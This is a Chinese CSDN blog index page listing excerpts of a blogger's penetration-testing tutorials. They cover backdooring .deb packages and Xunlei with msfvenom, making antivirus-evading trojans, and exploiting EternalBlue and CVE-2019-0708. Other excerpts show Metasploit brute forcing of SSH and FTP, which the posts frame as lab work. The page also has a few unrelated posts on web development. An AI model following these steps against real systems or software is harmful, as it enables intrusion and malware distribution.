保持微笑-泽-CSDN博客

原创 2022-渗透测试-制作恶意deb软件包来触发后门

目录1.下载软件包2.解压软件包小知识1：kali更新或安装包的目录小知识2：kali解压或安装操作3.生成恶意代码到软件包源文件中4.创建软件包信息目录5.重新生成一个软件包6 将deb提供下载7 启动msfconsole8.配置监听10 目标机下载并安装带木马的deb软件11.目标机安装软件12 监控端获取到session1.下载软件包kali安装软件包apt install 软件名称kali下载软件包apt --down..

2022-01-19 16:28:35 2589 8

原创渗透测试-Windows远程桌面服务漏洞（CVE-2019-0708）

目录1.漏洞简介2.影响范围3.漏洞复现4.漏洞修复1.漏洞简介2019年5月14日，微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁，该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞，便可以在目标系统上执行任意代码，该漏洞的触发无需任何用户交互操作。这就意味着，存在漏洞的计算机只要联网，无需任何操作，就可能遭遇黑客远程攻击，运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完.

2022-01-18 15:33:18 3917 2

原创渗透测试-使用metasploit的evasion模块生成后门木马

1.evasion简介evasion是metasploit自带的模块，使用此模块可以生成反杀毒软件的木马。2.操作流程打开kali系统的Metasploit软件。如图，我们可以看到evasion中有7个模块查看模块 search evasion使用模块use evasion/windows/windows_defender_exe查看需要配置的参数 show options生成软件set FILENAME 666.exe指定一个payloadset ...

2022-01-17 17:08:03 1861 1

原创渗透测试-模拟黑客给软件加上后门获取shell

1.下载一个正常的软件我们这里以迅雷为例安装迅雷，打开软件，启动任务管理器，查看进程。如图所示，在迅雷启动的同时，会自动启动一个迅雷下载引擎DodnloadSDKServer.exe *32软件，这时我们就可以在这个软件里面直入后门，也就是给子程序捆绑后门。注：不要对主软件进行后门植入，以免造成软件不能正常使用。2.将迅雷的子程序上传到kali系统的根目录下3.对子程序注入payload后门程序命令：msfvenom -a x86 --platform window

2022-01-17 11:37:00 1782 2

原创渗透测试-制作一个‘有吸引力的软件‘去获取电脑shell(功能很强大,有惊喜)

1.客户端渗透原理在我们无法突破对方的网络边界的时候，往往需要使用客户端渗透这种方式对目标发起攻击。实验环境：一台kali，一台win7，两台主机是在一个局域网内。

2022-01-16 21:12:23 1374 3

原创 2022-渗透测试-信息收集-Metasploit(基于FTP协议)

目录1.查看FTP服务的版本信息2.通过FTP拿到root权限3.ftp匿名登陆扫描4.ftp暴力破解1.查看FTP服务的版本信息1.打开kali系统的Metasploit软件。2.查找模块 search ftp_version3.使用模块4.查看需要配置的参数 show options5.设置目标主机--靶机 set RHOSTS 192.168.0.1126.run如图，我们可以得知ftp的版本号是2.3.42.通过FTP...

2022-01-16 18:05:55 1953 2

原创 2022-渗透测试-信息收集-Metasploit(基于SSH协议)

1.查看SSH服务的版本信息search version2.useauxiliary/scanner/ssh/ssh_version3.show options4.set RHOSTS 192.168.0.112 设置目标主机-靶机5.run版本是：SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu12.对ssh进行暴力破解1.search ssh_login2.使用模块us...

2022-01-16 10:48:09 1242 1

原创 2022-渗透测试-信息收集-Metasploit(基于SMB协议)

SMB概述：服务器消息块，又称网络文件共享系统，一种应用层网络传输协议，由微软开发，主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。1.使用smb_version 基于SMB协议扫描版本search smb_versionuse auxiliary/scanner/smb/smb_versionshow optionsset RHOSTS 192.168.0.110, 192.168.0.112注意：逗号后面需要加一个空格run...

2022-01-16 10:09:00 1266 1

原创 2022-渗透测试-信息收集-Metasploit(基于SNMP协议)

简单网络管理协议(SNMP)，该协议能够支持网络管理系统，用以监测到网络上的设备是否引起管理上关注的情况。先使用root用户到Metasploitable2-Linux主机上修改一下SNMP服务，因为默认服务是不对外开放的。命令： vim /etc/default/snmpd我们将只监听本机IP127.0.0.1改为0.0.0.0重启服务 /etc/init.d/snmpd restart查看是否处于监听状态 netstat -pantu | grep 16...

2022-01-15 22:13:31 912 1

原创 2022-渗透测试-信息收集-Metasploit(基于TCP协议)

2022-渗透测试-信息收集-Metasploit(基于TCP协议)

2022-01-15 20:09:35 3134 2

原创实战-msf扫描靶机上mysql服务空密码

靶机的安装我们在上面的文章里讲解过了。操作流程：kali系统的IP是192.168.0.109。启动一台Metasploitable2-Linux靶机，网络模式设置为桥接。登录Metasploitable2-Linux系统用户名root，密码：root查看靶机的ip因为要查找的是mysql的空密码，涉及到登陆问题。我们可以去查找login。加载模块查看需要设置的参数设置目标主机设置目标账号查看 BLANK_PASSWORDS 是否...

2022-01-15 10:16:46 1395 3

原创实战-使用msf渗透攻击win7主机并远程执行命令

1.什么是永恒之蓝？永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。2.通过msf模块获取win7主机远程shell模块的整体使用流程如下

2022-01-14 21:48:11 2670 7

原创 Metasploit渗透测试（框架介绍、靶机安装、基本使用方法）

Metasploit渗透测试（框架介绍、靶机安装、基本使用方法）干货干货干货

2022-01-14 17:56:03 5218 3

原创常见的HTTP状态码和常用服务端口号

1.HTTP状态码分类2.常见的状态码200 - 请求成功301 - 永久性重定向，表示请求的资源被分配了新的URL，之后应使用更改的URL302 - 临时性重定向，表示请求的资源被分配了新的URL，希望本次访问使用新的URL400 - 客户端请求语法错误401 - 请求未经授权403 - 服务求收到请求，但是拒绝服务404 - 服务器上无法找到请求资源500 - 服务器内部错误503 -服务器暂时处于超负载或正在进行停机维护，现在无法处理请求。3.HTTP.

2022-01-13 20:51:57 4691 2

原创最强大的漏洞扫描与分析软件（Nessus）

1.Nessus软件是什么？如图，我们可以从百度百科得知：Nessus 是全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。2.Nessus软件的安装1.下载地址Download Nessus | Tenable®https://www.tenable.com/downloads/nessus如图所示，这个是下载官网。我们以kali系统为例。点击下载，然后将Nessus-10.0.2-debian..

2022-01-13 14:40:33 21377 7

转载 82个Web开发者工具汇总

01、Day.js地址：https://day.js.org/en/Day.js 是一个极简的 Javascript 库，大小只有大约 2Kb。它可以在浏览器和 NodeJs（服务器端）上工作。它和moment js非常相似，所以切换到这个库时你可以放心。此外，它还可以在当今最流行的浏览器上运行，例如 Windows XP 上的 Chrome，Windows 7 上的 IE 8、9 和 10，Windows 10 上的 IE 11，Linux 上最新的 Firefox，以及新的 Saf...

2022-01-11 19:52:00 2825

原创通过WireShark抓包解决电脑被黑上不了网

1.什么是ttl？TTL是IP协议包中的一个值，指定数据报被路由器丢弃之前允许通过的网段数量，每经过一个路由节点，TTL值减1。当TTL的值是0的时候，说明目标地址不可达并返回：Time to live exceeded默认Linux操作系统值是64。2.场景电脑被黑上不了网，可以ping通网关，但是不能上网。3.模拟场景修改主机TTL值为1，下面的方式是我们临时修改内核参数。（默认是64）我们去ping一下我们的网关，发现是可以ping通的。然后去ping 8.

2022-01-11 17:05:35 10815 3

原创用PHP写一个-万年日历表

首先，给大家展示一下效果图。功能包括：年份和月份查询，上一年、下一年、上一月、下一月和回到今天这几个功能。项目文件项目代码1.php<?php echo "<pre>"; //设置时区 //date_default_timezone_set('America/New_York'); //1.获取时间戳 var_dump(time()); //2.格式化时间戳 var_dump(date('Y-m-d H:i:s',time()));..

2022-01-11 09:22:23 3203 2

原创 2022渗透测试-信息收集笔记

1.被动信息收集被动信息收集即不向目标系统进行探测，不会留下任何痕迹。通过网络、公开渠道进行信息收集。收集的内容包括IP地址段、域名信息、邮件地址、⽂档图⽚数据、公司地址、公司组织架构、联系电话 / 传真、⼈员姓名 / 职务、目标系统使⽤用的技术架构、公开的商业信息等。1.DNS信息收集1.域名是分级的概念，而FQDN是域名下的主机(如：www.baidu.com)，注意两者不同。2.域名记录类型：A、CNAME、PTR、MX、NS、TXT、TTL3.DNS查询工具nslookupe

2022-01-10 21:32:15 999 1

转载 Apache Log4j 远程代码执行漏洞批量检测工具

漏洞描述由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。影响版本Apache Log4j 2.x < 2.15.0-rc2影响范围含有该漏洞的Log4j影响到超过 6000个中间件或应用，目前已知的可能受影响的应用及组件包括但不限于如下清单中所列出的： Sp...

2022-01-10 09:47:57 3437

原创分享一些渗透测试的工具（压箱底的）(附带下载链接)

SQL注入webshellxss测试暴力破解编程工具编码转换菜刀代码审计漏洞利用逆向工程日志分析扫描工具数据库漏洞利用工具提权信息收集远程工具抓包分析下载地址（百度网盘）：永久有效链接：https://pan.baidu.com/s/185oGawHlqhL14bVo7oPY7w提取码：hd6r...

2022-01-09 17:23:40 1949 5

原创 2022-WEB前端-CSS学习笔记

CSS层叠样式表命名规则：使用字母、数字或下划线和减号构成，不要以数字开头一、css的语法----------------------------- 格式：选择器{属性:值;属性:值;属性:值;....} 其中选择器也叫选择符 CSS中注释：/* ... */ 二、在HTML中如何使用css样式（html中嵌入css的方式）；----------------------------------------------------...

2022-01-09 16:45:12 262 1

原创 Phpstudy简介与使用教程

1.phpstudy是什么？phpstudy是一个php运行环境的集成包，用户不需要去配置运行环境，就可以使用，phpstudy不仅是一款比较好用的php调试环境工具，并且还包括了开发工具和常用手册，对于新手是有很大帮助的。2.phpstudy下载地址 https://www.xp.cn/3.phpstudy的使用教程1.打开软件，启动Apache和MySQL服务。2.点击网站，点击管理里的根..

2022-01-08 19:18:41 59832 15